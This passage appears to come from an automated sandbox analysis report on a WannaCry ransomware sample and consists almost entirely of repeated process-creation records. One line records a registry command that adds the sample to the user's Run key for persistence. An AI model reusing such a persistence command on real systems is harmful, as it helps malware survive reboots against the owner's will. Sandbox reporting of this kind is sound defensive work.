              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe coJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
